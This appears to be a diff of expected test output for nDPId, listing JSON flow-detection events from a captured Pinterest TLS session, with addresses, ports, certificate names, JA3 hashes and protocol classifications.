-02751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+02777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
